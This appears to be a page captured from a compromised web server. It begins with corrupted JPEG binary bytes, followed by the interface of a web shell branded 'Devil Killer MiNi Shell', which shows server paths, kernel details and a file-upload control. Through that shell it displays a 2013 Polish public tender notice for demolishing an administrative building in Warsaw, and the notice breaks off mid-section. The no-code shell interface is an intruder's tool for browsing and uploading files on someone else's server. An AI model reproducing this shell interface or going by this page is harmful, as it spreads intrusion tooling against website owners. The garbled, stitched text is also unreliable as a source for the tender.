JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130729/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130729/300790-N-2013.html

<p class="kh_header"><b>Warszawa: Rozbiórka budynku administracyjno-biurowego oraz innych obiektów zlokalizowanych na działce nr 10 obręb 0412 w Warszawie</b><br>
<b>Numer ogłoszenia: 300790 - 2013; data zamieszczenia: 29.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Personalizacji Dokumentów Ministerstwa Spraw Wewnętrznych , ul. Pawińskiego 17/21, 02-106 Warszawa, woj. mazowieckie, tel. 22 6028110, faks 22 6028716.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cpd.msw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbiórka budynku administracyjno-biurowego oraz innych obiektów zlokalizowanych na działce nr 10 obręb 0412 w Warszawie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest rozbiórka budynku administracyjno-biurowego oraz innych obiektów zlokalizowanych na działce o nr ewid. 10 w obrębie 0412 o powierzchni 0,4143 ha, położonej w Warszawie przy ul. Smyczkowa 10 wraz z wywozem i utylizacją gruzu i odpadów oraz wszystkich innych elementów pochodzących z rozbiórki.
2.	Zakres robót obejmuje:
2.1.	całkowite (wraz z fundamentami) rozebranie budynku wolnostojącego za wyjątkiem części budynku, w której znajduje się stacja transformatorowa. Budynek składa się 
z dwóch obiektów połączonych łącznikiem. Część niższa posiada jedną kondygnacja nadziemną, zaś część wyższa - trzy kondygnacje nadziemne. Budynek jest w całości podpiwniczony z umieszczonymi pod częścią niższą garażami. Powierzchnia budynku netto 2 694,84 m2, kubatura brutto budynku 10 745,03 m3. Szczegółowy opis stanu istniejącego zawarty jest w inwentaryzacji budowlanej (załącznik nr 10 do SIWZ) opracowanej przez mgr inż. Sławomira Waszaka. Wykonawca nie spowoduje swoimi działaniami przerw w dostawie energii elektrycznej odbiorcom podłączonym do Stacji Transformatorowej Miejskiej. Ewentualne roszczenia finansowe odbiorców obciążą Wykonawcę. Wykonawca ponosi odpowiedzialność za ewentualne uszkodzenia Stacji Transformatorowej Miejskiej;
2.2.	zabezpieczenie pozostawionej części budynku przed katastrofą budowlaną i wpływem czynników atmosferycznych w sposób opisany w projekcie budowlanym i wykonawczym,
2.3.	odłączenie w budynku i odkopanie dwóch kabli telekomunikacyjnych (miedzianych) na odcinku około 40 m i zwinięciem kabla w ziemnej studni wykonanej przez Wykonawcę oraz rozebraniem dwóch studzienek telekomunikacyjnych,
2.4.	odłączenie budynku od sieci wodociągowej wraz z rozebraniem istniejących sieci na terenie działki oraz przeniesieniem wodomierza do wybudowanej przez Wykonawcę studzienki wodomierzowej w sposób opisany w projekcie budowlanym i wykonawczym oraz w warunkach wydanych przez Miejskie Przedsiębiorstwo Wodociągów i Kanalizacji S. A.,
2.5.	odłączenie budynku od sieci kanalizacji sanitarnej wraz z rozebraniem istniejących sieci na terenie działki do studzienek przyłączeniowych w sposób opisany w projekcie budowlanym i wykonawczym oraz w warunkach wydanych przez Miejskie Przedsię-biorstwo Wodociągów i Kanalizacji S. A.,
2.6.	odłączenie budynku od sieci kanalizacji deszczowej wraz z rozebraniem istniejących sieci na terenie działki do studzienek przyłączeniowych w sposób opisany w projekcie budowlanym i wykonawczym oraz w warunkach wydanych przez Miejskie Przedsię-biorstwo Wodociągów i Kanalizacji S. A.,
2.7.	odłączenie budynku od sieci ciepłowniczej, demontaż urządzeń węzła cieplnego wraz z odwiezieniem ich do ZEC Południe i rozebranie istniejących sieci na terenie działki w sposób opisany w projekcie budowlanym i wykonawczym oraz w warunkach wydanych przez Dalkia Warszawa S. A.,
2.8.	odłączenie istniejących instalacji energetycznych w sposób opisany w projekcie bu-dowlanym i wykonawczym, za wyjątkiem podłączenia do Stacji Transformatorowej Miejskiej,
2.9.	odłączenie i rozebranie istniejącej sieci oświetlenia zewnętrznego oraz fundamentów lamp oświetleniowych w sposób opisany w projekcie budowlanym i wykonawczym;
2.10.	zabezpieczenie studzienki telefonicznej przez zniszczeniem i wpływem czynników at-mosferycznych w sposób opisany w projekcie budowlanym i wykonawczym,
2.11.	zabezpieczenie kosiarki samojezdnej do utrzymania terenu wraz z oprzyrządowaniem, w fabrycznie nowym kontenerze z zabezpieczeniem przed otwarciem, dostarczonym przez Wykonawcę oraz przewiezienie go do obecnej siedziby Zamawiającego. W przy-padku stwierdzenia uszkodzenia pojazdu z winy Wykonawcy, do czasu jego przewie-zienia do siedziby Zamawiającego, Wykonawca poniesie koszty naprawy wynikające z uszkodzeń. Kontener po dostarczeniu go do siedziby Zamawiającego przechodzi na własność Zamawiającego, na podstawie protokołu zdawczo-odbiorczego;
2.12.	zabezpieczenie znajdującego się na działce określonej w pkt 4.1 drzewostanu przed jego uszkodzeniem i wycinką. W przypadku samowolnej wycinki drzewostanu bądź jego uszkodzenia w wyniku, którego wycinka okaże się niezbędna Wykonawca poniesie odpowiedzialność karną i finansową określoną odpowiednimi przepisami prawa;
2.13.	całkowite (wraz z fundamentami i posadzką) rozebranie śmietnika wykonanego 
w konstrukcji murowanej - fotografie obrazujące obiekt stanowią część załącznika nr 12 do SIWZ,
4.2.14.	całkowite rozebranie fundamentu żelbetowego znajdującego się przy ogrodzeniu 
w północnej części działki - fotografie obrazujące obiekt stanowią część załącznika nr 12 do SIWZ,
2.15.	całkowite rozebranie istniejących na działce ramp i schodów terenowych, dróg i placów o nawierzchni asfaltowej i z kostki betonowej ok. 980 m2 oraz chodników z kostki betonowej i płyt betonowych wraz z krawężnikami, obrzeżami i podbudową o powierzchni około 220 m2;
2.16.	segregacja, wywiezienie i utylizacja powstałego gruzu i odpadów oraz wszystkich in-nych elementów pochodzących z rozbiórki zgodnie z Ustawą z dnia 14 grudnia 2012 r. o odpadach (Dz. U. 2013 nr 0 poz. 21). Elementy metalowe, szkło i inne odpady, które mogą być wykorzystane jako surowce wtórne winny zostać odwiezione przez Wykonawcę do odpowiednich punktów odbioru tych surowców. Zamawiający wymaga by Wykonawca przedstawił karty utylizacji odpadów wraz z adresem i fotografiami zutylizowanych śmieci;
2.17.	uporządkowanie i wyrównanie terenu wraz z zasypaniem wykopów (za wyjątkiem wy-kopu po budynku głównym) piaskiem z zagęszczeniem. Wykopy te powinny być zasy-pane, a teren ukształtowany w sposób zapewniający odprowadzenie wód opadowych bez powstawania zastoin.
2.18.	wykonanie studni chłonnych w dnie wykopu po rozebranym budynku głównym.
3.	Przedmiot zamówienia należy wykonać w oparciu o:
3.1.	treść niniejszej specyfikacji istotnych warunków zamówienia,
3.2.	obowiązujące przepisy prawne, normy branżowe oraz sztukę budowlaną,
3.3.	projekt budowlany i wykonawczy oraz specyfikację techniczną wykonania i odbioru robót opracowaną przez Pas Projekt Archi Studio Sławomir Golenko (załącznik nr 11 do SIWZ),
3.4.	przedmiar robót stanowiący część projektu wykonawczego jest jedynie materiałem pomocniczym dla obliczenia ceny i jego zadaniem jest jedynie przybliżenie Wykonawcy zakresu i sposobu wykonania prac.
4.	Wykonawca zobowiązany jest, w okresie realizacji umowy, do posiadania ubezpieczenia:
4.1.	od wszystkich ryzyk budowy i montażu (rozbiórki) związanych z wykonywaniem za-mówienia publicznego na sumę gwarancyjną nie niższą niż pełna wartość wynagro-dzenia brutto,
4.2.	od odpowiedzialności cywilnej, a w szczególności zniszczenia mienia Zamawiającego, z tytułu wykonania przedmiotu umowy na sumę gwarancyjną nie niższą niż pełna wartość wynagrodzenia brutto,
4.3.	od odpowiedzialności cywilnej z tytułu na wypadek śmierci lub kalectwa spowodowa-nych działaniem lub zaniechaniem działania przez Wykonawcę na sumę nie niższą niż 25% wartości umowy brutto, dział dotyczący OC powinien zawierać klauzulę pra-codawcy,
4.4.	od skutków nieszczęśliwych wypadków osób zatrudnionych przy realizacji robót oraz innych osób przebywających na terenie budowy za wiedzą Wykonawcy - na sumę nie mniejszą niż 20 tys. zł na jednego osobę,
Wszystkie sumy ubezpieczeniowe mają być na wszystkie i na jedno zdarzenie (wypadki) ubezpieczeniowe i być takiej samej wartości. Umowy ubezpieczeniowe mają mieć klauzulę udziału własnego Wykonawcy w szkodzie nie większego niż 1% sumy ubezpieczenia. Wykonawca będzie zobowiązany do aktualizacji sum ubezpieczeniowych (doubezpieczenia do wartości początkowej) w przypadku każdorazowej wypłaty odszkodowania. Umowa ubezpieczeniowa powinna być zawarta na okres realizacji umowy powiększony o 3 miesiące. Zamawiający dopuszcza zawarcie przez Wykonawcę kilku umów ubezpieczeniowych.
Uwierzytelnioną kopię lub oryginał polisy lub innego dokumentu potwierdzającego fakt zwarcia i zakresu umowy ubezpieczeniowej wraz z dowodem opłacenia składek ubezpieczeniowych Wykonawca winien dostarczyć Zamawiającemu najpóźniej w dniu podpisania umowy, ale przed jej podpisaniem. W razie nie dochowania obowiązku dostarczenia polisy lub innego dokumentu z wyznaczonym terminie Zamawiający wyznaczy drugą datę zawarcia umowy. W przypadku niedotrzymania przez Wykonawcę dodatkowego terminu, Zamawiający uzna, iż Wykonawca uchyla się od zawarcia umowy. Nie zachowanie ciągłości lub wymaganej wartości ubezpieczenia uprawnia Zamawiającego do naliczenia kary umownej przewidzianej w umowie, 
z prawem do odstąpienia od umowy włącznie.
5.	Wykonawca zobowiązany jest do prowadzenia prac budowlanych w sposób jak najmniej uciążliwy dla otoczenia, w tym w szczególności zabrania się prowadzenia głośnych prac budowlanych w porze nocnej.  Wszelkie prace związane z przedmiotem zamówienia będą realizowane przez Wykonawcę w godz. 6.00 - 22.00.
6.	Wykonawca zobowiązany jest do zabezpieczenia i dbania o dobry stan drzew i krzewów występujących na działce. Wartość wszelkich kar za usunięcie bez stosowanego zezwolenia lub trwałe uszkodzenie zieleni, które zostaną nałożone przez właściwe urzędy, zostanie potrącona z wynagrodzenia Wykonawcy lub z zabezpieczenia należytego wykonania umowy.
7.	Okres gwarancji i rękojmi: Wykonawca udzieli Zamawiającemu 12 miesięcy gwarancji i rękojmi licząc od dnia podpisania końcowego protokołu odbioru robót..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających w wysokości nie większej niż 50% wartości przedmiotu zamówienia, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.00.00-1, 45.11.10.00-8, 45.11.11.00-9, 45.11.12.20-6, 45.11.12.91-4, 45.11.13.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. W przedmiotowym postępowaniu, przed upływem terminu składania ofert, Wykonawca zobowiązany jest wnieść wadium w wysokości:
35 000 zł
słownie: trzydzieści pięć tysięcy złotych.
2. Wykonawca może wnieść wadium w jednej lub kilku następujących formach:
2.1. pieniądzu,
2.2. poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
2.3. gwarancjach bankowych;
2.4. gwarancjach ubezpieczeniowych,
2.5. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r Nr 96, poz. 620).
3. Wadium wnoszone w pieniądzu należy wpłacić na rachunek bankowy Centrum Personalizacji Dokumentów Ministerstwa Spraw Wewnętrznych, ul. Pawińskiego 17/21, 02-106 Warszawa - Bank Zachodni WBK S.A. nr rachunku 46 1500 1777 1217 7005 1279 0000 z adnotacją: Wadium do przetargu pn.  Rozbiórka budynku administracyjno-biurowego oraz innych obiektów zlokalizowanych na działce nr 10 obręb 0412 w Warszawie (nr sprawy: 12/CPD/PN/ROZB/2013).
4. W przypadku wniesienia wadium w pieniądzu za moment wniesienia uznaje się moment uznania rachunku Zamawiającego. Potwierdzenie lub kserokopię potwierdzenia wpłaty wadium należy dołączyć do oferty.
5. W przypadku wadium wnoszonego w poręczeniu lub gwarancji, oryginał dokumentu (poręczenia lub gwarancji) należy złożyć w kasie Centrum Personalizacji Dokumentów Ministerstwa Spraw Wewnętrznych, ul. Pawińskiego 17/21, pok. nr 13. Kasa czynna codziennie w godz. 8.30 do 15.30 za wyjątkiem sobót, niedziel oraz świąt. Kopię dokumentu (poręczenia lub gwarancji) zdeponowanego w kasie, poświadczonego za zgodność z oryginałem przez osobę podpisującą ofertę należy dołączyć do oferty wraz z kopią potwierdzenia wniesienia wadium w kasie. Wzór takiego potwierdzenia określony został w formularzu ofertowym - załącznik nr 1 do SIWZ.
6. W przypadku wnoszenia wadium w postaci poręczenia bankowego lub poręczenia spółdzielczej kasy oszczędnościowo-kredytowej, Wykonawca winien przedłożyć dokument poręczenia wystawiony przez poręczyciela, zawierający informację o udzieleniu poręczenia stanowiącego wadium na rzecz Centrum Personalizacji Dokumentów MSW do przetargu pn. Rozbiórka budynku administracyjno-biurowego oraz innych obiektów zlokalizowanych na działce nr 10 obręb 0412 w Warszawie (nr sprawy: 12/CPD/PN/ROZB/2013), ważnego przez okres związania ofertą określony w SIWZ oraz zobowiązanie poręczyciela do nieodwołalnej, bezwarunkowej, płatnej na pierwsze żądanie Zamawiającego wypłaty wadium w przypadkach określonych w art. 46 ust. 4a i 5 ustawy PZP.
7. W przypadku wniesienia wadium w gwarancjach bankowych Wykonawca winien przedłożyć pisemną gwarancję udzieloną przez bank, zgodnie z wymaganiami określonymi przez prawo bankowe, obowiązującą przez okres związania ofertą określony w SIWZ, zawierającą informację, że udzielona gwarancja stanowi wadium na rzecz Centrum Personalizacji Dokumentów MSW do przetargu pn. Rozbiórka budynku administracyjno-biurowego oraz innych obiektów zlokalizowanych na działce nr 10 obręb 0412 w Warszawie (nr sprawy: 12/CPD/PN/ROZB/2013), ważne przez okres związania ofertą określony w SIWZ oraz zobowiązanie podmiotu udzielającego gwarancji do nieodwołalnej, bezwarunkowej, płatnej na pierwsze żądanie Zamawiającego wypłaty wadium w przypadkach określonych w art. 46 ust. 4a i 5 ustawy Pzp.
8. W przypadku wniesienia wadium w gwarancjach ubezpieczeniowych Wykonawca winien przedłożyć pisemną gwarancję udzieloną przez firmę ubezpieczeniową, obowiązującą przez okres związania ofertą określony w SIWZ, zawierającą informację, że udzielona gwarancja stanowi wadium na rzecz Centrum Personalizacji Dokumentów do przetargu pn. Rozbiórka budynku administracyjno-biurowego oraz innych obiektów zlokalizowanych na działce nr 10 obręb 0412 w Warszawie (nr sprawy: 12/CPD/PN/ROZB/2013), ważne przez okres związania ofertą określony w SIWZ oraz zobowiązanie podmiotu udzielającego gwarancji do nieodwołalnej, bezwarunkowej, płatnej na pierwsze żądanie Zamawiającego wypłaty wadium w przypadkach określonych w art. 46 ust. 4a i 5 ustawy Pzp.
9. W przypadku wniesienia wadium w poręczeniach udzielonych przez podmioty, o których mowa, w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r. Nr 42, poz. 275), Wykonawca winien przedłożyć dokument poręczenia wystawiony przez poręczyciela, zawierający informację o udzieleniu poręczenia stanowiącego wadium na rzecz Centrum Personalizacji Dokumentów MSW do przetargu pn. Rozbiórka budynku administracyjno-biurowego oraz innych obiektów zlokalizowanych na działce nr 10 obręb 0412 w Warszawie (nr sprawy: 12/CPD/PN/ROZB/2013), ważne przez okres związania ofertą określony w SIWZ oraz zobowiązanie poręczyciela do nieodwołalnej, bezwarunkowej, płatnej na pierwsze żądanie Zamawiającego wypłaty wadium w przypadkach określonych w art. 46 ust. 4a i 5 ustawy Pzp.
10. Zwrot albo utrata wadium następować będzie zgodnie z treścią art. 46 ustawy Pzp.
11. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust.1 ustawy Pzp, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana, jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego. W przypadku wadium wnoszonego w poręczeniu lub gwarancji, Wykonawca winien przedłożyć zobowiązanie podmiotu udzielającego gwarancji lub poręczyciela do bezwarunkowej wypłaty wadium na pierwsze żądanie Zamawiającego w przypadkach określonych w art. 46 ust. 5 ustawy, tj. zatrzymania wadium przez Zamawiającego wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
11.1. odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
11.2. nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
11.3.	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>przewiduje się udzielenie zaliczek na poczet wykonania zamówienia</b></li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek, o którym mowa w art. 22 ust. 1 pkt 2 pzp za spełniony, jeżeli Wykonawca wykaże, że posiada doświadczenie zawodowe niezbędne do wykonania zamówienia, tj.: wykaże się wykonaniem, co najmniej 3 robot budowlanych polegających na wykonaniu robót budowlanych o podobnym charakterze o wartości minimum 300 000 zł brutto każda, w tym, co najmniej 1, polegającej na rozbiórce budynku, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej 
i prawidłowo ukończone - załącznik nr 5 do SIWZ. Przez roboty budowlane o podobnym charakterze Zamawiający rozumie roboty budowlane w ramach, których wykonywane były prace obejmujące swoim zakresem: rozbiórkę budynków, remont, rozbudowę, przebudowę lub budowę budynków.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje osobami, w tym minimum:
a) jedną osobą, która będzie kierować robotami (kierownik budowy) z uprawnieniami do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej lub odpowiadającymi im ważnymi uprawnieniami wydanymi na podstawie wcześniej obowiązujących przepisów lub przepisów innych państw,
b) jedną osobą, która będzie kierować robotami (kierownik robót) z uprawnieniami do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodo-ciągowych i kanalizacyjnych lub odpowiadającymi im ważnymi uprawnieniami wydanymi na podstawie wcześniej obowiązujących przepisów lub przepisów innych państw,
c) jedną osobą, która będzie kierować robotami (kierownik robót) z uprawnieniami do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej 
w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadającymi im ważnymi uprawnieniami wydanymi na podstawie wcześniej obowiązujących przepisów lub przepisów innych państw.
Osoby te muszą być członkami Izby Inżynierów Budownictwa zgodnie z Ustawą o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów oraz posiadać opłacone ubezpieczenie od odpowiedzialności cywilnej zgodnie z Rozpo-rządzeniem Ministra Finansów z dnia 11 grudnia 2003 r. w sprawie obowiązkowego ubezpieczenia odpowiedzialności cywilnej architektów oraz inżynierów budownictwa.
W przypadku osób będących obywatelami Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu dopuszcza się kwalifikacje uznane na podstawie przepisów ustawy z dnia 18 marca 2008 r. o zasa-dach uznawania kwalifikacji zawodowych nabytych w tych państwach (Dz. U. Nr 63, poz. 394) w związku z art. 12a ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. z 2010 r. Nr 243, poz. 1623 ze zm.). Osoby te winny przed rozpoczęciem robót uzyskać tymczasowy wpis na listę członków okręgowej izby inżynierów budownictwa w celu świadczenia usług trans-granicznych, a do umowy Wykonawca będzie zobowiązany przedłożyć kopię zawiadomienia o zamiarze świadczenia usług trans-granicznych złożo-nego przez takie osoby.
Wykonawca, jako dowód, przedłoży wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami zgodny w treści z załącznikiem nr 6 do SIWZ oraz oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień zgodne w treści z załącznikiem nr 7 do SIWZ. Wykonawca w stosunku do osób, którymi będzie dys-ponował, a nie jest ich pracodawcą lub nie łączy go z nim umowa cywilno-prawna, za-łącza pisemne oświadczeniem podmiotów dysponujących nimi o udostępnieniu zasobów w tym zakresie na okres korzystania z nich przy realizacji zamówienia podpisane przez osobę/osoby posiadające umocowanie do składania oświadczeń wiedzy i woli w imieniu tychże podmiotów (przykładowe oświadczenie stanowi załącznik nr 8 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
